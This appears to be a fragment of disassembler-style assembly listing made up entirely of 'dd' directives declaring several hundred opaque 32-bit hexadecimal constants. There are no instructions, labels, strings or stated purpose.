		dd 7FB24073h, 440A50AAh, 97541415h, 11B5B3CCh, 0A3E4272h
		dd 6D3C54D8h, 570EE140h, 0F4F79D65h, 25F8239Fh,	0EE8E5DA5h
		dd 0DF92FCEEh, 2A80EE5Fh, 2B02A0F9h, 6B6E618Eh,	0C1CA7463h
		dd 15DB6554h, 4721D7Eh,	5DEA174Dh, 1325F776h, 8E5A2DB2h
		dd 0BF5AE9EBh, 0CFAE246Ah, 8E056540h, 0C97E130Bh, 909F8782h
		dd 2E3493FAh, 87B263F2h, 0CDA30456h, 0E1AAD683h, 0C4FD9133h
		dd 535C96F8h, 0C71277ACh, 0CE896128h, 11513BF1h, 60B91696h
		dd 9328B445h, 0A712932Bh, 52B6FA48h, 66CDEEBEh,	0F1DC299Eh
		dd 77F6E51Ch, 0F8E5FF7Fh, 6B8B899Bh, 4C2542h, 0C74DE334h
		dd 80CE32EFh, 0B777C4ABh, 381FDE8Ah, 0EDE065E6h, 78CA3737h
		dd 0B9B7D274h, 374CBE00h, 7E99D12Fh, 7E5FBB6h, 0C23E3E8Eh
		dd 13C83AF8h, 0AA8CECA6h, 19983612h, 3926BC8Eh,	85B99F60h
		dd 0BFD8D73Fh, 14C47249h, 1888BDA3h, 3E7FF669h,	0E057225Ch
		dd 61B676Bh, 191BE2E1h,	6CACA83Bh, 0DE2D1BEFh, 0BACEEBB1h
		dd 0BDF0B522h, 0BAD335EEh, 0CFC2D5ABh, 929A3D57h, 617AD3B8h
		dd 0E2642977h, 0F3EE240Ch, 0FE437EFBh, 0ACAE7DD2h, 0CD900988h
		dd 77A787B1h, 4D7EFD31h, 0CDD73E09h, 5615A058h,	0E0F448B4h
		dd 14495DCEh, 86EACCBEh, 737AEE8Bh, 0A3410E65h,	18F3FC10h
		dd 72DD66A3h, 0E4AC3244h, 5337A76Fh, 0B6BDEA6Ah, 2A2573D6h
		dd 73469E0Fh, 9BF92377h, 0DB5B48D2h, 210FCFBFh,	671E58C6h
		dd 0D3223B18h, 9C8CED07h, 1CE54179h, 77D8DA15h,	0F06EA21Dh
		dd 0A563BA92h, 8F43B07Dh, 3763AF61h, 4ECFBDF1h,	52BF0AA1h
		dd 0C75E7DBCh, 0EA0C01D5h, 6B41EFCCh, 29F46611h, 0E3D94557h
		dd 5BB288BFh, 0CF037C15h, 6C6B68F5h, 38D2F3E0h,	6C5ABA66h
		dd 0A2F03EE1h, 98DC202Eh, 0A4769763h, 3563559h,	0A2D198E6h
		dd 1EAA90BDh, 75F15896h, 0AA584777h, 0DB5FD4B4h, 0B8F072E8h
		dd 271B3B7Bh, 0FAE850FCh, 45DE8216h, 0B5140B37h, 5B04CCABh
		dd 28DE9D17h, 8AB61C01h, 0B27E19CCh, 0B45BEEFBh, 188957E9h
		dd 0F4B1E018h, 0A31D7A27h, 0D68DA85Ah, 89E643EBh, 0D7632C29h
		dd 1D2FCDCFh, 0D3E5D1ADh, 0BAD1A410h, 0DBE15845h, 70ED071Eh
		dd 0AFBFDE62h, 0C8D2CC51h, 0A97E3694h, 7935FFC3h, 6E52B060h
		dd 1A29CE37h, 0C324A71Ch, 2CCE7595h, 0D1122E25h, 2D8520C9h
		dd 0A29FC0F8h, 8A263BF9h, 451F8A8Ch, 0D145EB7Bh, 0BAA0E6FAh
		dd 0C1DF5E87h, 0CD4C6B17h, 0B14F5693h, 0B8DE0979h, 0A3FB6BE3h
		dd 0AF222FDDh, 56211BF2h, 55ECB450h, 6BF73DEh, 89D07135h
		dd 2DD5EBE5h, 7EA7CB3Eh, 0A6376EB4h, 0FCB77094h, 2882689Eh
		dd 0CCC01E26h, 14A69248h, 2FC2FB15h, 0A072E13Ch, 0D945F7EEh
		dd 5A4A269Fh, 3568187Dh, 56E61D25h, 6C2ADF56h, 0A28DEB70h
		dd 0DF76BC2Ch, 0A6A47B70h, 51ACEE8Ch, 9E3EFFEDh, 73312538h
		dd 0E098199Bh, 47DDA0CAh, 0D2EC1D32h, 0C476E14Ah, 0C44DD720h
		dd 0A9B30858h, 496D8BA2h, 0A5EA46A5h, 5DBA1B6Bh, 35EC68C4h
		dd 2A1799F8h, 0FDD94298h, 92B393B6h, 59EB26ECh,	1D3B8691h
		dd 56F04E0Dh, 8733DFB1h, 5FA63EBFh, 666FC594h, 2C6273F6h
		dd 0EDA590C0h, 0A7E15D95h, 0E0F222D8h, 2846E8F1h, 7EA91299h
		dd 64E5EF1h, 5105FA20h,	988EEB78h, 8B2CCA43h, 0B2B52537h
		dd 515761A2h, 25AB7CF9h, 989E6923h, 5236D47Dh, 247234B0h
		dd 0A1C8D155h, 650EF938h, 27B961E7h, 4DDCB9B4h,	24935C12h
		dd 0D88E71C4h, 5549B286h, 0AB83C2ABh, 9BAA73D8h, 9FEC1D55h
		dd 0D27A822Ah, 0CABD6EF5h, 9C7481C7h, 61556857h, 0FDC50CF5h
		dd 0AF2A82A9h, 30A4F0F1h, 92D07737h, 0E0F4CF8Ah, 98C0AA9Dh
		dd 6845DF6Eh, 7A1A2B7Dh, 650A500Bh, 56CDD75Ah, 3D54E7E8h
		dd 4BD15BEEh, 0D3AFBE16h, 768DFEB0h, 97A266AAh,	98C8F03h
		dd 0AB625648h, 0EDE74A1Bh, 30BDEC99h, 9B207710h, 0E8A047ACh
		dd 0A131EC9Bh, 2378D984h, 74F6559Bh, 0C8FBC58Bh, 0F8BA8085h
		dd 0B87EF55Fh, 65DB07Ah, 93F13347h, 9590C9F0h, 0D6F23C9Fh
		dd 0BC1ED31Ch, 5508486Ch, 77B41431h, 0FB98AABh,	18CA7BF3h
		dd 1C5F0EDEh, 0DCABBCCBh, 2E02BFAFh, 352BE287h,	0DF5D46B6h
		dd 0F2EE2FF1h, 0BF63A42Ah, 0E2ED128Fh, 8C2A849Eh, 0DDB5D744h
		dd 529F0C07h, 0AA6F56DAh, 92BFDB2Ah, 5F449979h,	6561A375h
		dd 54A0C89Fh, 101DF8FCh, 5696102Dh, 29FED42Dh, 14FF8A37h
		dd 71E2B513h, 1CACCC2h,	83E8F33Eh, 0F5EB2FDBh, 249A84ECh
		dd 330FA93Eh, 25A30CFCh, 0E793BC8Eh, 0F87806BBh, 0A1A95EB7h
		dd 8BF2C3D8h, 583EABC0h, 3A3022F2h, 2CBF380Ch, 3DF59FAEh
		dd 449F0255h, 3FA46AD9h, 0C1D5D923h, 4465E9E3h,	0AE53DD97h
		dd 159D994h, 27DA3527h,	4C1EE726h, 62197966h, 0FE615F5h
		dd 83B23C8Bh, 7876661Fh, 0FCE3C99Dh, 20B0AD14h,	0B75B116Dh
		dd 0C8AAD23h, 0B4E37EA8h, 28A3EA40h, 0F44746ACh, 234D3508h
		dd 0F3E27776h, 0D787B3E0h, 0F5B0D68Ch, 0BBF42261h, 7D1AE499h
		dd 0DA24F160h, 0D8F8FC54h, 3A225FF1h, 0F254995Ch, 0F6E28A89h
		dd 0CF1A1D20h, 0F339D8DFh, 78FBD50h, 6EEADAFEh,	0F788D5B1h
		dd 4CDE45F9h, 786EB41Dh, 7B3CAC50h, 2C4ADB62h, 65508D1Fh
		dd 0FF1985C1h, 0DB713DEDh, 0B76456C3h, 3DD5787Dh, 0E545FE5Ah
		dd 889C2B76h, 82877468h, 7CD4F386h, 0A9CF50FDh,	31271E2Ch
		dd 0FFC63C4Bh, 0BADF90CCh, 681A7DDBh, 0F2D646CBh, 69BF43D9h
		dd 0FE6735F0h, 0CD4BBF69h, 0A7F103EDh, 0D59BBD56h, 75143CBBh
		dd 4BF14691h, 0A4B64EAh, 0E0B732B5h, 76A6FD1Fh,	0DD5A7E9Ch
		dd 32ABCF95h, 0B4F4E94Ch, 0F48C8E50h, 0D6098A44h, 299C6838h
		dd 0B6A56C41h, 8DAE9BEh, 4BC4FDD7h, 5AB74252h, 0D9A85565h
		dd 0E29BEC59h, 2C676AB0h, 60267A10h, 0D6043C29h, 7AB2F137h
		dd 0E6FA9015h, 53475761h, 0FFB6F4E6h, 967A9833h, 32B7E1E2h
		dd 0E80E4894h, 0A03B7855h, 0CC5DB659h, 3339F171h, 115E990Fh
		dd 4257B9A7h, 0E7C38EA8h, 0B59DDE86h, 8ADD86E9h, 927A6F79h
		dd 6CA918EEh, 5DB26823h, 498A201Eh, 0EC10AA06h,	3607227Bh
		dd 0F7CDB5ADh, 1E19970Bh, 0AEAF7B3Dh, 0EBC8927Ah, 0A5712A2Eh
		dd 921E215Bh, 812065A9h, 0D5507DA2h, 1022BC7Dh,	0D2C949BEh
		dd 1195DE0Ch, 33FDD647h, 1577DCD4h, 6C1E7FE0h, 32B45937h
		dd 0F87A7974h, 91A93D75h, 5C3D1D44h, 0A3F59075h, 0D67B2EBAh
		dd 0B4573F7Dh, 2D23F557h, 0BE83BAD6h, 58193A87h, 34E63E86h
		dd 90F3DA21h, 5D716106h, 0A5128302h, 1805B279h,	0A193B183h
		dd 3227F2F6h, 79E5CC5Dh, 35FC5Dh, 41602C2Ah, 0BF751DD7h
		dd 0F530627Ch, 7AD1A1D7h, 0C7A75BA3h, 0BF3AD7D5h, 5B483FBEh
		dd 2756AD02h, 0FC407E33h, 0C8D27751h, 0CBF215ADh, 690A7D1h
		dd 15361FE5h, 9E14C759h, 0E61DF75h, 25DDE274h, 0B43BF5B0h
		dd 9D4DB10Eh, 0D240E148h, 621FBBEAh, 0D472B58Dh, 0CAAED4EBh
		dd 15EC0BBFh, 4E766209h, 770FC7B2h, 48B696CAh, 8A01C6CEh
		dd 2EE92C2Bh, 0AD1CB93h
		dd 0BBDBDE70h, 0FE68DD32h, 0C3F89DC0h, 0BFE21279h, 2B8E8014h
		dd 0AAB3CA01h, 6A14450Fh, 0FA1197Ch, 5D061E4Ch,	7F7568F1h
		dd 0C5D68F33h, 8F75CDCBh, 396E2990h, 0EC81C34Dh, 77F2DB5Dh
		dd 0ADB43170h, 0F9476884h, 0C182B398h, 597F0D57h, 0FF797BCAh
		dd 0C5CD416Ch, 3555A06Ah, 1868B7D4h, 12525C14h,	0AAC9F62Bh
		dd 6C261F83h, 624C18DBh, 954E15FAh, 0A36F7A82h,	5CB9C6F2h
		dd 9B13ECD4h, 0DFCCCFBEh, 2FF2FE3h, 79A4F695h, 15B23919h
		dd 74C541C0h, 9902D527h, 7F5A9157h, 7773D1B3h, 0B55DAAA6h
		dd 98DC7C6Bh, 0A3784846h, 0CBDA5A27h, 0C7121E46h, 633E2F0Ch
		dd 4ABC581Fh, 0F8B2C6A9h, 7D99FF3Bh, 5A372AEBh,	0DFBD6AAFh
		dd 16A45180h, 24055807h, 0BF1CEF62h, 6760F2AFh,	54B82B46h
		dd 942BDADAh, 0CB2B381Fh, 64C6EB1Dh, 4AEBA844h,	61CBD852h
		dd 9CC88F93h, 0CB23B156h, 4FD27E0Bh, 5F1F5B7Eh,	0C1F9F65Fh
		dd 69DB63A0h, 3E4BDC07h, 0AF603C09h, 0FD850B10h, 5F8D7DD9h
		dd 0F7ABEB70h, 3F5958D7h, 9486AB8h, 9B655C44h, 0C977F6A2h
		dd 270DD0BFh, 367D1B76h, 6A4E067Ah, 0F253D8FEh,	0F9D51A57h
		dd 0F0599EA8h, 0E6903144h, 38AC20EAh, 0FF6F552Bh, 9856182Ch
		dd 0FD010D99h, 0B8D1F3D3h, 0C18AC0F9h, 2C61B6Dh, 89FE749Eh
		dd 16D7F7DEh, 591B8444h, 0D114C967h, 0ED10425Eh, 42E78F3Ah
		dd 1F484AFFh, 8873455Ch, 0F3DD5CD9h, 0A2F9BDC1h, 0E76C4A79h
		dd 0AB1CC39h, 65AE3D2Ah, 55AC7447h, 65F5F888h, 0D8D60FAAh
		dd 0B549CCE5h, 80672C91h, 0E837A0A6h, 76C80F17h, 5A6855DBh
		dd 0E994BED0h, 0D8475501h, 46DC2C7Dh, 7554335Ah, 14A26AECh
		dd 8D42830Dh, 0BC7BDAD8h, 0D1BC8CAAh, 890A754Ah, 5391A99Eh
		dd 0DFB6E4Ah, 92FC7AA6h, 6E95EC14h, 98B32A44h, 0BA7BDD59h
		dd 0C5D530B7h, 0F14B8764h, 768B48BFh, 92244232h, 0E9283AB9h
		dd 53636F9Eh, 86C138D3h, 0D2B4A85Dh, 4CCDD267h,	0FF0B75B6h
		dd 0A1C836DDh, 0DFE4DA0Ch, 2B9548A4h, 0CA8D3E53h, 4AA11CD3h
		dd 0DA9BC8F0h, 2305AA8Fh, 8D3F68FBh, 309F9622h,	0C2F3D8B7h
		dd 58512DA5h, 2655407Dh, 53C136DEh, 74BA4E35h, 53679D68h
		dd 0A20DC49Dh, 0D6156ABDh, 784D8882h, 0B65D0CBAh, 8CE2FFB8h
		dd 4E7D5058h, 0C2579DC3h, 0AADBD0D6h, 0AB6A6B73h, 2A12BB63h
		dd 944AEA0Bh, 65AA74Ah,	3D377319h, 39EDAFB5h, 76A5EB05h
		dd 4CAC1286h, 32D19BD3h, 8476C988h, 0DD64E587h,	0FDF27A66h
		dd 3DD3BE41h, 5E7AE484h, 0B5162424h, 0A823E2D8h, 0B53AF643h
		dd 0FDAACAEFh, 4344F565h, 6C9624D1h, 77FD9353h,	0BFE8C5C6h
		dd 0EEA942F8h, 53A7D1A4h, 4E62C852h, 0EF1E4AFh,	0C776F5CEh
		dd 0E2976608h, 0B93E5367h, 0CA87E745h, 4BA09AB9h, 0B5A60359h
		dd 5D552CD8h, 0F1CBD434h, 81FE157Ah, 0D66B66F8h, 0EBCC711Ah
		dd 0AEB1893Ah, 0B8D255CDh, 0EEBC348Eh, 595624B6h, 5C71DF11h
		dd 2F1BE782h, 6FAC0A71h, 0BF64DF9Bh, 0C17D7756h, 3BCF9643h
		dd 0BFF364C0h, 7926EE5Eh, 0E455B2FCh, 961A77Fh,	5416F108h
		dd 6629A16Ch, 1CC6B8B3h, 0DC1EDEBCh, 0D83FE3D7h, 0E730A77Ah
		dd 8331BEA7h, 7D7BCB2Bh, 5F2BC18Fh, 69BFF29h, 722A0F29h
		dd 7575C0B8h, 6DC599DDh, 6F840B5h, 9C0841B7h, 0DD255F58h
		dd 0EBE5D634h, 0BB0277A3h, 0C43FCEA1h, 0D83AB7B0h, 0A3E41132h
		dd 5B372E2Ch, 5EC2D449h, 79878619h, 73D712EDh, 20D8E269h
		dd 13B55AC3h, 0F8BA767Ah, 548975C0h, 5FA83A7Dh,	9A2392F2h
		dd 5EA580E1h, 0C8C34FF1h, 7A55E516h, 0B6FB863h,	0D92B7760h
		dd 0AC5BF5CEh, 7945872h, 5B301754h, 5A9B6300h, 5B368C5Dh
		dd 0AAC1B52Ah, 2D05BA7Ch, 0DF375B74h, 287F24A6h, 0DD5F5662h
		dd 4747AE4Eh, 6AB51FFAh, 709DE95Fh, 483A26Dh, 8E69C394h
		dd 81317398h, 0E53C4692h, 7448244Dh, 83770DF6h,	23437EE6h
		dd 12BB1EB6h, 0C156AC78h, 0ACB1DB8Eh, 0FEF548Dh, 0A2B540Ch
		dd 7472D9FDh, 8B058D30h, 2FA46856h, 0A74BA675h,	91A87ADCh
		dd 5BAE0F9h, 3EB843Fh, 2D3EE881h, 8F079006h, 676852E9h
		dd 1B36910Eh, 50DEE263h, 0AD44D44h, 0A5E35E53h,	0FD32AB73h
		dd 0F99BA54Ch, 0EC52B67Eh, 35BB8CF3h, 1EDA531Ah, 949804A8h
		dd 0CEB0371Fh, 14CB517Eh, 0AF32430Ch, 291D7FB8h, 0AAE2791h
		dd 64AA65CEh, 0D71ED638h, 7FE1768Ah, 79885552h,	0BFCE9721h
		dd 0BFBFECD0h, 0BB9C85AFh, 22F11656h, 6619A973h, 0A5E0BA8Ch
		dd 8942391h, 0A88C619Dh, 3972FF40h, 5BFC56DCh, 0A3B9551Eh
		dd 72758C71h, 5FD4F587h, 0CB246E8h, 2FE8A08Dh, 0CC92CBD9h
		dd 0BE7AFA5Ah, 313B671Ch, 0B4DADFC3h, 83AF581Fh, 5B6F5722h
		dd 9E15ECA3h, 0FB89C3FBh, 6BE20DFh, 228F3C0Fh, 5B235129h
		dd 0C7494C53h, 0FDF8EFABh, 54E5DBB7h, 0C266F84Bh, 24F7F6DEh
		dd 31BE1D38h, 50B565B3h, 0A6BD844Dh, 3606ABBCh,	0A1292B0Eh
		dd 8599AA31h, 9DD70D6Ah, 1BC80D8Fh, 0F99C9F46h,	0F2711C22h
		dd 474A6410h, 66B172D1h, 30EEEACCh, 5C097E82h, 0A9CA0465h
		dd 0B21FAAD2h, 859386ECh, 0BDD84413h, 0DCDA08C2h, 88193D8Dh
		dd 0EC0603F7h, 84525FB9h, 0B81ECF69h, 0DF25C1ADh, 909E4746h
		dd 0EDEAFB32h, 3AD80F5Eh, 0FD4A291Eh, 17AE9C25h, 6D5F6052h
		dd 7D8950FCh, 0B5A76461h, 2B8F595Dh, 0C9EE0627h, 343E6848h
		dd 0FC677B7Eh, 0B929DD3Eh, 75A90CCFh, 6739DACFh, 8F835E34h
		dd 0F43173EAh, 74DFDD1Bh, 5213E64Ah, 504BF514h,	9C8FF2ECh
		dd 7EE0F2B5h, 0D4AB307Ch, 3C97B76h, 0B1DA35E3h,	2B0B62B0h
		dd 0DDD72298h, 0BB0AB4E2h, 62E66F59h, 0F31CB2CAh, 31252D04h
		dd 1EBFC5F6h, 0F4A83603h, 552D3F6Bh, 44D6D19Ah,	5411B6EAh
		dd 8C75546h, 82CE5C72h,	7587C6D1h, 0AF19C1E2h, 91ECDC8Fh
		dd 96FA4BA7h, 7D98A3B3h, 0B5DBABEFh, 4595BCECh,	0F09262D4h
		dd 858AF3C3h, 0EBE5BC32h, 957468EDh, 0EF615384h, 7CFF70ECh
		dd 6F457C8Fh, 0C786606Fh, 0A77B1514h, 61725B42h, 0C6D1CBF0h
		dd 0DC5A2AF4h, 7D3C7254h, 5E157B80h, 0B53B9ABBh, 0C66AE8F2h
		dd 6BA35894h, 1CB778A1h, 565CBB89h, 3F4ABEB9h, 8BA60FE8h
		dd 0D6769F6h, 7886E89h,	57CADA2Fh, 0D114BF26h, 4AC84EEFh
		dd 2512DFE1h, 0F52CF215h, 4B10FFE0h, 0FEDE7BD4h, 17D64463h
		dd 5620CD5Eh, 8496A5E1h, 0BE8E7D50h, 0AB64C4AFh, 0C5C377DEh
		dd 0A7FC2F42h, 552BF0BFh, 26399E52h, 0E4281569h, 0FFF2433Eh
		dd 0D073AC94h, 0E384265Ah, 88A61106h, 12553E66h, 8B8C312Eh
		dd 0CD33ABD5h, 5EAEF078h, 64441C5Eh, 0FFA012EAh, 5B13A2A8h
		dd 0BD3129Eh, 415818CDh, 31CE2B9Eh, 0A1A26541h,	183E9A75h
		dd 0B4C062E7h, 17080410h, 2A70056Dh, 439F82C3h,	8BDCA06Ch
		dd 7C73AB96h, 0A791C542h, 0F215044h, 5DF6D697h,	957D6C7Eh
		dd 0F20C5FDBh, 0B96BC1C9h, 3637F399h, 0F498BA5Dh, 992DCEAFh
		dd 3F046018h, 0AC399935h, 8E352712h, 8C2F23DEh,	0FC811EAFh
		dd 0A521F0D9h, 88FA81CAh, 0B52A7960h, 3643A896h, 0E8FEF4F0h
		dd 67EE3026h, 37363EACh, 0E27D69FFh, 6EC1F3D9h,	92EEFDF4h
		dd 0C76DBD91h, 5AB0E07Dh, 1EBF55DEh, 0F32D0DAh,	7C5F92E0h
		dd 7CB24998h, 292FF38Ch, 0E81BE028h, 8731930Ch,	6FE5C33Eh
		dd 82657AE6h, 0EA0FCABAh, 8CE0B03Dh, 0C39F5BDDh, 67DFF385h
		dd 350F74C5h, 8A6393B3h, 4755DBEDh, 7A7375FEh, 7E1016EAh
		dd 0C0E41936h, 997C45E8h, 37453258h, 84130F27h,	1338FBE1h
		dd 0F70345B1h, 0FEAFC4B4h
		dd 5A7A4754h, 0F64176F5h, 0E7EAFAB6h, 0A3522995h, 2FC83480h
		dd 2E5C3F62h, 2FB2DBB2h, 0FE54E254h, 0FC4DBF8Bh, 208F6830h
		dd 4CC16A4Eh, 5A204589h, 29E49DF6h, 30FC3D55h, 839FE76h
		dd 3A17666Ch, 0DA2AFA2Ch, 8F31F1A8h, 31BB5AD8h,	0C07773FBh
		dd 0BD72ED46h, 0D5653B39h, 0A095A996h, 2F195FA9h, 0AD8D9B46h
		dd 33069544h, 0E995C82h, 42735659h, 0E427BAC1h,	0AC00AFE4h
		dd 644CDEEAh, 7942A372h, 719C601Dh, 28B010BFh, 749A3E6Eh
		dd 0E9DF9A79h, 57FA186Dh, 92A66196h, 0E748FDE8h, 6E82387Eh
		dd 0DDA2675Eh, 8C3F9E08h, 6EAE9D90h, 0D1EFF49Eh, 0B6B29447h
		dd 5EE0742h, 53662C9Fh,	0B46734C7h, 0A4C6ED1Fh,	0CE73A0EAh
		dd 12F67AA8h, 1BFAC7D8h, 86C0D87Eh, 631D9BD9h, 0E4ADB653h
		dd 0EB966F38h, 9DC656DBh, 0F4D1EB7Bh, 9EAEFDDEh, 0A142552Fh
		dd 7B8EDE9Bh, 5DED533Ah, 0A42A8471h, 86ACDB1Ch,	0A3B09EB7h
		dd 0C722618Ah, 2F5CD97Fh, 0CC17BAE9h, 0FF05268Ah, 6F021E8Ah
		dd 2ED6C7AEh, 53A9C1ADh, 3AA85C3Bh, 9986E7F8h, 0A3CAFBCEh
		dd 66E01C58h, 65151C06h, 8F15FD45h, 0D22FE65Eh,	4EB863B7h
		dd 788DEFECh, 0A3437FC6h, 35350526h, 51277753h,	95C7F5AEh
		dd 0A12803A8h, 8FC3B8C6h, 9A0E8E2Ah, 0B2FE5A39h, 0FBC99756h
		dd 0EEFA7A77h, 0FB021D6Fh, 0DF716A57h, 61F883F2h, 0F9A9BC55h
		dd 0BD1A3812h, 783E22F4h, 0AF81D2FBh, 0ECCE8EE7h, 32EF9460h
		dd 4BE85A2Ch, 0AECFE555h, 0AD50D319h, 0C1E30BF9h, 0C8F9EBAEh
		dd 675A4A34h, 7485F55Eh, 0B47E98Dh, 57DAE2D3h, 9F2ABB0Dh
		dd 62B8B62Bh, 0F37086F3h, 0F6567C51h, 2EBCFC7Dh, 8D9AA284h
		dd 3422AA16h, 0F5FCA84Eh, 0E100D581h, 0D0E77ACAh, 0D28B7FACh
		dd 54F7768Ah, 33F4D068h, 0ADA6DE24h, 0C1A83D31h, 7E36ADDBh
		dd 1FE99A78h, 6670F4FAh, 0BE27B4E7h, 56BF3E2Dh,	5CEBA3E7h
		dd 4B7063F9h, 89EFBE90h, 4F0536F6h, 51D422CDh, 5FD018C7h
		dd 61D2FAD4h, 4D23A7C0h, 5D762BD6h, 6563F756h, 8B2A1DEAh
		dd 9C7583CAh, 23DCC782h, 9338523Dh, 514D0308h, 90D973FCh
		dd 0FA08DC8Ah, 1D1D8BAAh, 0D923D4A8h, 7A6C35A1h, 8DE736B7h
		dd 0D9450Bh, 0F839D8FCh, 2617EEB2h, 5F3D9F79h, 0FA932905h
		dd 8FA3B220h, 0AE7478ABh, 0F9D45DDh, 0BFD555EEh, 5ED15A10h
		dd 45DFCE7Dh, 2AB3C9A7h, 0F9CFD22Ch, 0B21D2041h, 190C97E1h
		dd 236A8CE7h, 0F17E0FB6h, 0A9B6974Eh, 7457FE0Fh, 462F4B3Fh
		dd 0AEDB2105h, 2783CCD2h, 0AF67304Bh, 0F4CB748Bh, 27978DA8h
		dd 0AD4DF1A6h, 0A992D1C8h, 54ABB258h, 968AAF81h, 0CCA3F71Ch
		dd 0E25B15D6h, 7F81796Fh, 1B6CBD64h, 0CF602C11h, 5B5C95FDh
		dd 0AD49CFACh, 7BCECB38h, 0F589572Eh, 7490FE42h, 16DEDD85h
		dd 9A10B1AAh, 5E30F779h, 8E0B61C1h, 0AB6BF0B5h,	0B394F487h
		dd 0B1CAD5FBh, 0DEA75473h, 36561880h, 0EBE7497Dh, 4AC88BDFh
		dd 0C77A9C76h, 0BC979320h, 0AB2AD939h, 0F7DFF3E5h, 513B6FD7h
		dd 99D64575h, 85BE65F7h, 0AF2F8DE9h, 0B53DED66h, 3706E874h
		dd 35C31BF5h, 0A4463877h, 0C5F2C82Dh, 3B2FFE19h, 6B5D303Fh
		dd 0C8F7B247h, 0B883718Ah, 9DCDC955h, 88DFC107h, 534AE576h
		dd 313665D2h, 0BC9FC440h, 1B67E711h, 8605B4h, 2914C675h
		dd 0D8C05DE1h, 8D310EBh, 417E6FEBh, 31C02D05h, 5E1BAA1Ah
		dd 4E32D115h, 687D8C66h, 64CDB2B5h, 82A07506h, 0A344673Bh
		dd 99CD0A45h, 3979FB82h, 0AAB9C531h, 88C4A690h,	42F52FCh
		dd 6C213671h, 8291C0CCh, 0C97A9FC1h, 0CD83CECAh, 446B8E46h
		dd 0D4C2CFB2h, 3EBE86Ah, 359D275h, 0AD9E82E7h, 28FAE18Fh
		dd 642DA613h, 99F1F3DFh, 0C54DEFE5h, 89C42A54h,	0B9A13AA9h
		dd 45CD9169h, 8CBE3C9Bh, 6A17E6BDh, 0DC4FA0F3h,	6BC3E094h
		dd 6731470h, 87DD951Dh,	0D587504Ah, 0EE1E5DC2h,	64F168Bh
		dd 2B71AB47h, 0D8D141FFh, 5FD2B65Fh, 5FDBB118h,	55E5080Eh
		dd 4E128A2Ah, 0CAB17928h, 9505E954h, 0C528C695h, 9190EB49h
		dd 0DA91E318h, 0E26F90C0h, 65FF0950h, 4AA1F07Eh, 6070586Bh
		dd 0F2828251h, 0D4E7F7C0h, 37A19A63h, 8E5659EDh, 926DA818h
		dd 0A5E59607h, 0CC3F4682h, 97652D68h, 857FE42Ah, 43C7F4E4h
		dd 8BAFBE33h, 0C1AB63ACh, 91F581A1h, 0ED68D273h, 0E024129Ah
		dd 0A35FC2AFh, 0CAEB9CADh, 68A93189h, 0DAB7674Dh, 892046FCh
		dd 0BCCDC2C0h, 4BA9C711h, 89DA97FBh, 0B44C7195h, 26E5EF90h
		dd 97235D04h, 1A857958h, 98318BF4h, 95D52898h, 0D43FEC06h
		dd 0A17BC026h, 94BCDDF5h, 51E293A2h, 33350F7Bh,	2239A556h
		dd 287F0577h, 0F83E712Ch, 0B7F8C84Dh, 82A9BFD6h, 587E6AEAh
		dd 0CAB09CB1h, 0B47D557Bh, 0F9C8EF56h, 0C3094C12h, 2C709D7Bh
		dd 0F5B963E6h, 221A1FD9h, 0F0F459A8h, 0B542BBDAh, 0AF895129h
		dd 0FBED968Dh, 214A8846h, 4B78155Bh, 489383F7h,	0D59B3ACCh
		dd 15B1E388h, 0F25A0DA3h, 8226AB3Ch, 64D817B2h,	5AD4AF5Dh
		dd 16721D24h, 83C64FF5h, 973A731Fh, 0D25AAF7Ah,	0CA1AB788h
		dd 0B09C3E96h, 0BEC8C0CDh, 7A1BFDF8h, 57333D09h, 0BDD9BB5Bh
		dd 109782F1h, 4B635A34h, 82435AAAh, 8ABBF6E1h, 0DFD0C50h
		dd 0A2B30ED6h, 0E2A17A80h, 2A24EC0Fh, 5B9C8286h, 22DB959Eh
		dd 0A33581BCh, 0D59E29ADh, 0EF8AA19Dh, 1F90100Bh, 7D24DBB7h
		dd 2E4B24CAh, 79BA7D86h, 4F975FC3h, 0B427583Fh,	38EB9576h
		dd 96CDCCF9h, 54ADB710h, 2B795816h, 2B79E611h, 0D538557Dh
		dd 0F09F790h, 70A63017h, 38BA5FC5h, 0FD695A3Eh,	7DB88711h
		dd 0CE5FAD3Ch, 0D699ED53h, 0F7A4E7EFh, 548E2A5Fh, 0DA6790D1h
		dd 0E0F92AFFh, 2C03C187h, 0DE49B607h, 0FB618AAAh, 5998FE99h
		dd 0BB8BF8CEh, 0CA76FE1Fh, 0F42A6504h, 0D7DD745Bh, 0C58BFA8Ah
		dd 5EEBCAAEh, 7B7096CEh, 1B150E0Ah, 477DADEBh, 8F6EF9D4h
		dd 0BCB886B2h, 0F68B700Bh, 6F2DB5C1h, 0F1815867h, 0C5CAB4D5h
		dd 75C30DBEh, 8935DD6h,	0AFCE7C53h, 0F76EFC7Ah,	7D72B913h
		dd 1A23D5Ah, 78F7FF82h,	3A62F360h, 35418BB9h, 0BFBFEE47h
		dd 604ED1D3h, 0D82B2968h, 613E3408h, 0EED198F9h, 297E0089h
		dd 0B0742B6Ch, 0BD9A5398h, 0F56614BBh, 0B035C48Dh, 0D027E521h
		dd 0B84B74F7h, 72522F52h, 7F7D274Ch, 7089F16Fh,	883476F6h
		dd 0E2BC6434h, 0C5AFC28Fh, 0A23FFF3Bh, 5483FC87h, 0EBBE6FC7h
		dd 3E7841F0h, 0B4CDB3A3h, 0F2F7A62Ch, 16B66ABEh, 1DE486AAh
		dd 0E3301B4Ch, 54AC2089h, 4B263CBCh, 0E5338EEDh, 7318EB8Fh
		dd 581B00C7h, 72677DC5h, 0BF178F8Dh, 20CC151Ch,	479A6273h
		dd 0E5F4F078h, 6ED60839h, 21F87055h, 455EC9F3h,	55218D09h
		dd 9B3272F1h, 0A7C80A63h, 0B2B7F8D1h, 0D94F1A3Dh, 62C974E4h
		dd 5B4299B2h, 0B81E8B78h, 51F05DB2h, 118D1CA6h,	62FDFB2Ah
		dd 41ECF390h, 0BBB48BBBh, 6B2B4B49h, 0B5AE40B8h, 35A2C93Ch
		dd 56E3FCC3h, 564A1531h, 9D9BEEh, 0C829FBF6h, 2F263A42h
		dd 0E78977E4h, 2D18F84Bh, 141BC2F0h, 7834A85h, 2407F4AEh
		dd 0D43FBF97h, 0F20E372Ch, 968C1B71h, 153BD15Fh, 0F0DE607h
		dd 0D66A02CEh, 9885EF10h, 5EBDB505h, 83C93F17h,	0DDB1F92Ah
		dd 0AB081D73h, 92FA4069h, 0C55ADEEFh, 0AE82E68h, 691D68D4h
		dd 0C7BA334Dh, 441B6908h, 61E60185h, 7097AC01h,	4228E5B6h
		dd 980DE5D2h, 0FA80CE2h, 0B57A8953h, 88A44244h,	0B064E64Ah
